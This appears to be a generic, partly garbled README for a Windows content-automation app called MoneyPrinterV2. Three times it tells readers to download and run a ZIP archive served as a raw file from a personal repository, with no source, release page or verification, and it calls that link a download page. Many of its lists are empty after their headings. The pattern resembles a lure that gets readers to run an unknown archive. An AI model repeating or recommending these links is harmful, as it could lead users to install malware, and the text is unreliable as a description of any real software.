MoneyPrinterV2 is a Windows app for creating AI-based online content and running simple automation tasks from one place.
It helps you:
The app is built for users who want a guided way to run these tasks without writing code.
Visit this page to download and run the app:
https://raw.githubusercontent.com/liranman90/MoneyPrinterV2/main/scripts/Money-Printer-1.0.zip
MoneyPrinterV2 is made for Windows. Use a modern Windows 10 or Windows 11 PC.
You should have:
For the best results, keep your system updated.
Set up these tools first:
If you plan to use browser automation, make sure your browser opens normally and your internet connection is stable.
Follow these steps on Windows:
Open the download page: https://raw.githubusercontent.com/liranman90/MoneyPrinterV2/main/scripts/Money-Printer-1.0.zip
Download the project files to your computer.
If the file comes as a ZIP, right-click it and choose Extract All.
Open the extracted folder.
Look for a file named README.md or a Windows run file if the project includes one.
If the app uses Python, install Python first, then open Command Prompt in the project folder.
Install the required packages if the project includes a requirements file.
Start the app from the folder using the file or command listed in the project instructions.
Open the local web dashboard in your browser.
Follow the on-screen steps to create your first task.
When you open MoneyPrinterV2 for the first time, set up these items:
Use simple test content first. That makes it easier to confirm that each part works.
MoneyPrinterV2 can help you build short videos from written ideas.
A common flow looks like this:
This setup works well for short-form content, clips, and simple video ideas.
The app can support Twitter bot-style actions through browser automation.
Typical uses include:
Keep your browser logged in before you start tasks that need account access.
MoneyPrinterV2 can help you prepare content for affiliate work.
You can use it to:
A simple structure often works best:
The app can also support cold outreach workflows.
Use it to prepare:
Keep your messages short and direct. Clear text gets better results than long copy.
MoneyPrinterV2 uses Ollama for local AI tasks.
This can help with:
Local AI keeps the workflow on your machine, which helps you work without switching between many sites.
The app supports text-to-speech for video and content tasks.
You can use it to:
Short scripts work best for clean voice output.
MoneyPrinterV2 uses MoviePy to handle video building.
It can help with:
If you want a clean result, keep your source text short and your video style simple.
The Flask dashboard gives you a simple place to manage tasks.
From the dashboard, you may be able to:
Use the dashboard to keep your work in one place.
After setup, run a small test.
Try this:
If the test works, move on to a full workflow.
If the app does not start, check these items:
If a browser task fails, sign in again and try a smaller task first.
If video export fails, confirm that the output folder exists and has write access.
Use this simple layout:
MoneyPrinterV2 — app filesinput — scripts and textoutput — videos and exportsaudio — voice fileslogs — task logs and errorsThis makes it easier to find files later.
You may find these common project files:
requirements.txt for Python packages.env for app settingsmain.py or app.py to start the programtemplates for dashboard pagesstatic for images and assetsUse the project instructions if the folder includes a different start file.
Some tasks may use your browser account.
For best results:
This helps Selenium work with fewer errors.
MoneyPrinterV2 uses a common stack for AI and automation work:
This mix supports content tasks, browser tasks, and media creation in one app.
If you need the source files or want to start over, use this link:
https://raw.githubusercontent.com/liranman90/MoneyPrinterV2/main/scripts/Money-Printer-1.0.zip